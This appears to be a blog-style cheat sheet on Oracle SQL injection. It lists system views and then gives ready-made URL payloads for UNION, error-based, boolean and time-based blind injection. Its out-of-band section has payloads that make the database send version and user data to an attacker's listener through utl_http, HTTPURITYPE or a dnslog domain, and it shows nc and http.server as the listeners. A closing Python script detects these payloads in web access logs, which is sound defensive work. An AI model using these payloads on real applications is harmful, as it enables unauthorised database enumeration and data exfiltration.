Web Security -- SQL Injection -- Oracle Injection

Published: 2025-05-20

1. Oracle basics

1.1 System variables and tables

Version: SELECT * FROM V$VERSION

User name: USER, SYS_CONTEXT('USERENV','SESSION_USER')

Database (schema) names: ALL_USERS, USER_USERS, DBA_USERS

Table names: ALL_TABLES, DBA_TABLES, USER_TABLES

Column names: ALL_TAB_COLUMNS, USER_TAB_COLUMNS

1.2 CASE

There is no IF(); use CASE WHEN ... THEN ... ELSE ... END

1.3 String concatenation (||)

Strings are concatenated with ||, not +

1.4 Delays

DBMS_PIPE.RECEIVE_MESSAGE('X',5)

DBMS_LOCK.SLEEP(5)

1.5 Other notes

Oracle is strict about data types, so the form ?id=1 and 1=(...)-- + is the most reliable for injection

A SELECT must always have a FROM clause; use the dummy table DUAL: select user from dual

2. Oracle information gathering

Current user: UNION SELECT USER FROM DUAL

Current database: UNION SELECT SYS_CONTEXT('USERENV','CURRENT_SCHEMA') FROM DUAL

Database version: UNION SELECT BANNER FROM V$VERSION

Table enumeration: SELECT table_name FROM all_tables

Column enumeration: SELECT column_name FROM all_tab_columns WHERE table_name='USERS'

3. Oracle injection techniques

3.1 UNION-based injection

Testing the injection point

?id=-0'+AND+1=1--
?id=-0'+AND+1=2--

Determining the number of columns

?id=-0'+ORDER+BY+3--

Version information

?id=-0'+UNION+SELECT+BANNER,+NULL+FROM+sys.v_$version+WHERE+ROWNUM+=+1--

Determining column types and display positions

?id=-0'+UNION+SELECT+NULL+,+NULL+FROM+DUAL--
// replace NULL with 'NULL'; if the page still renders, both columns are character type
?id=-0'+UNION+SELECT+'NULL'+,+'NULL'+FROM+DUAL--

Current database

?id=-0'+UNION+SELECT+'NULL'+,+(select+instance_name+from+V$INSTANCE+where+rownum=1)+FROM+DUAL--

Current user's privileges (roles)

?id=-0'+UNION+SELECT+'NULL'+,+(select+*+from+session_roles+where+rownum=1)+FROM+DUAL--

Current database user

?id=-0'+UNION+SELECT+'NULL'+,+(select+user+from+dual+where+rownum=1)+FROM+DUAL--

Table names

?id=-0'+UNION+SELECT+'NULL'+,+(select+table_name+from+user_tables+where+rownum=1)+FROM+DUAL--

// add a condition to skip the first table name: and+table_name+not+in+'PRODUCTS'
?id=-0'+UNION+SELECT+'NULL'+,+(select+table_name+from+user_tables+where+rownum=1+and+table_name+not+in+'PRODUCTS')+FROM+DUAL--

Column names

?id=-0'+UNION+SELECT+'NULL'+,+(select+column_name+from+user_tab_columns+where+table_name='PRODUCTS'+and+rownum=1)+FROM+DUAL--

// add a condition to skip the first column name: and+column_name+not+in+'ID'
?id=-0'+UNION+SELECT+'NULL'+,+(select+column_name+from+user_tab_columns+where+table_name='PRODUCTS'+and+rownum=1+and+column_name+not+in+'ID')+FROM+DUAL--

// add conditions to skip the first two column names: and+column_name+not+in+'ID'+and+column_name+not+in+'CATEGORY'
?id=-0'+UNION+SELECT+'NULL'+,+(select+column_name+from+user_tab_columns+where+table_name='PRODUCTS'+and+rownum=1+and+column_name+not+in+'ID'+and+column_name+not+in+'CATEGORY')+FROM+DUAL--

3.2 Error-based injection

#1. ctxsys.drithsx.sn()
?id=1 and 1=ctxsys.drithsx.sn(1,(select user from dual)) --

#2. XMLType()
?id=1 and (select upper(XMLType(chr(60)||chr(58)||(select user from dual)||chr(62))) from dual) is not null --

#3. dbms_xdb_version.checkin()
?id=1 and (select dbms_xdb_version.checkin((select user from dual)) from dual) is not null --

#4. dbms_xdb_version.makeversioned()
?id=1 and (select dbms_xdb_version.makeversioned((select user from dual)) from dual) is not null --

#5. dbms_xdb_version.uncheckout()
?id=1 and (select dbms_xdb_version.uncheckout((select user from dual)) from dual) is not null --

#6. dbms_utility.sqlid_to_sqlhash()
?id=1 and (SELECT dbms_utility.sqlid_to_sqlhash((select user from dual)) from dual) is not null --

#7. ordsys.ord_dicom.getmappingxpath()
?id=1 and 1=ordsys.ord_dicom.getmappingxpath((select user from dual),user,user)--

3.3 Boolean-based blind injection

Boolean blind injection with decode

#decode(expression, value1, value2, value3)
When the expression (a column, or an operation on a column) equals value1, the function returns value2; otherwise it returns value3

ASCII codes (printable range 32 to 126, which covers a-z and A-Z)
// test the length of the user name
?id=1 and 6=(select length(user) from dual) --
// extract the first character
?id=1 and 1=(select decode(ascii(substr(user,1,1)),'83',1,0) from dual) --
// extract the second character
?id=1 and 1=(select decode(ascii(substr(user,2,1)),'83',1,0) from dual) --
...
// verify the extracted value
?id=1 and 1=(select decode(user,'SYSTEM',1,0) from dual) --

// the database name, table names, column names and data can all be extracted the same way by replacing user with the corresponding subquery from the UNION section
?id=1 and 1=(select decode(ascii(substr((select table_name from user_tables where rownum=1),2,1)),'83',1,0) from dual) --

Boolean blind injection with CASE WHEN

// returns 1 when the ASCII code of the first character of user is 83, otherwise 2
case when ascii(substr(user,1,1))=83 then 1 else 2 end

// use in blind injection
?id=1 and 1=(case when ascii(substr(user,1,1))=83 then 1 else 2 end)--

3.4 Time-based blind injection

// DBMS_PIPE.RECEIVE_MESSAGE reads a message from the named pipe.
Usage: DBMS_PIPE.RECEIVE_MESSAGE('pipename',timeout)
pipename: a varchar(128) string naming the pipe; any value will do here.
timeout: an optional integer giving the number of seconds to wait.

// use in blind injection
?id=1 and 1=(dbms_pipe.receive_message('x', 5))--

// combined with a boolean condition
?id=1 and 1=(select decode(ascii(substr(user,1,1)),'83',dbms_pipe.receive_message('x',5),0) from dual) --

3.5 Out-of-band injection

utl_http.request()

1. First check whether utl_http.request() is available; a normal page response means it is supported
http://127.0.0.1/aaa.php?id=1 and exists (select count(*) from all_objects where object_name='UTL_HTTP') --

2. Listen locally and watch for the callback produced by the executed SQL statement
python3 -m http.server 8888
or nc -lvvp 8888

3. In the HTTP request, || can be URL-encoded as %7C%7C
http://127.0.0.1/aaa.php?id=1 and utl_http.request('http://IP:8888/'||(select banner from sys.v_$version where rownum=1))=1--

utl_inaddr.get_host_address()

# exfiltrate data via dnslog; || URL-encoded as %7C%7C
http://127.0.0.1/aaa.php?id=1 and (select utl_inaddr.get_host_address((select user from dual)||'.xxxx.dnslog.cn') from dual)is not null --


HTTPURITYPE()

1. Listen locally and watch for the callback produced by the executed SQL statement
python3 -m http.server 8888
or nc -lvvp 8888

2. In the HTTP request, || can be URL-encoded as %7C%7C
http://127.0.0.1/aaa.php?id=1 and (select HTTPURITYPE('http://IP:8888/'||(select user from dual)).GETCLOB() FROM DUAL)is not null --
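As an added example (not part of the original post), the following Python scans web access-log lines for the Oracle-specific indicators behind the techniques above (UNION, error-based, boolean and time-based blind, out-of-band) and tags each request with the technique it resembles. The log lines and the `.oob.example` callback domain are constructed; matching runs on the decoded query string, so `+` and `%7C%7C` encodings are handled.

```python
import re
from urllib.parse import unquote_plus

# Oracle-specific injection indicators, grouped by the techniques in the post.
# Patterns run against the URL-decoded, lowercased, whitespace-collapsed query string.
SIGNATURES = {
    "union":   [r"\bunion\s+(all\s+)?select\b"],
    "error":   [r"\bctxsys\.drithsx\.sn\b", r"\bxmltype\s*\(", r"\bdbms_xdb_version\.",
                r"\bdbms_utility\.sqlid_to_sqlhash\b", r"\bordsys\.ord_dicom\."],
    "boolean": [r"\bdecode\s*\(\s*ascii\s*\(\s*substr\b", r"\bcase\s+when\b.*\bascii\s*\(\s*substr\b"],
    "time":    [r"\bdbms_pipe\.receive_message\b", r"\bdbms_lock\.sleep\b"],
    "oob":     [r"\butl_http\.request\b", r"\butl_inaddr\.get_host_address\b", r"\bhttpuritype\s*\("],
    # Oracle-only syntax and catalog views: weak alone, strong when combined with any of the above.
    "oracle":  [r"\bfrom\s+dual\b", r"\bv_?\$version\b", r"\bv\$instance\b", r"\bsession_roles\b",
                r"\b(all|user|dba)_tables\b", r"\b(all|user)_tab_columns\b"],
}
COMPILED = {tech: [re.compile(p) for p in pats] for tech, pats in SIGNATURES.items()}

def normalize(query_string: str) -> str:
    """Decode twice (catches %2527-style double encoding), strip /* */ comments, collapse spaces."""
    s = unquote_plus(unquote_plus(query_string))
    s = re.sub(r"/\*.*?\*/", " ", s)  # inline comments are a common keyword-splitting trick
    return re.sub(r"\s+", " ", s).lower()

def classify(query_string: str) -> set[str]:
    """Return the set of technique labels whose indicators appear in the request."""
    s = normalize(query_string)
    return {tech for tech, pats in COMPILED.items() if any(p.search(s) for p in pats)}

# Constructed sample access-log lines (not real traffic); payloads mirror those in the post.
SAMPLE_LOG = """\
10.0.0.5 - - [20/May/2025:10:00:01 +0800] "GET /aaa.php?id=1 HTTP/1.1" 200 512
10.0.0.5 - - [20/May/2025:10:00:02 +0800] "GET /aaa.php?id=-0'+UNION+SELECT+BANNER,+NULL+FROM+sys.v_$version+WHERE+ROWNUM+=+1-- HTTP/1.1" 200 777
10.0.0.5 - - [20/May/2025:10:00:03 +0800] "GET /aaa.php?id=1%20and%201=(dbms_pipe.receive_message('x',%205))-- HTTP/1.1" 200 512
10.0.0.5 - - [20/May/2025:10:00:04 +0800] "GET /aaa.php?id=1%20and%201=ctxsys.drithsx.sn(1,(select%20user%20from%20dual))%20-- HTTP/1.1" 500 301
10.0.0.5 - - [20/May/2025:10:00:05 +0800] "GET /aaa.php?id=1%20and%20(select%20utl_inaddr.get_host_address((select%20user%20from%20dual)%7C%7C'.oob.example')%20from%20dual)is%20not%20null%20-- HTTP/1.1" 200 512
"""
REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+)')  # request target from a combined-format log line

def scan_log(log_text: str) -> list[tuple[str, set[str]]]:
    """Return (request_target, techniques) for every line carrying at least one indicator."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.search(line)
        if m and (techs := classify(m.group(1))):
            hits.append((m.group(1), techs))
    return hits

if __name__ == "__main__":
    for target, techs in scan_log(SAMPLE_LOG):
        print(sorted(techs), target)
```

The benign request on the first line produces no hit; each of the other four is tagged with its technique, and payloads that also touch Oracle-only objects such as DUAL or V$VERSION carry the extra "oracle" label, which is the signal worth alerting on even when the technique patterns miss.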

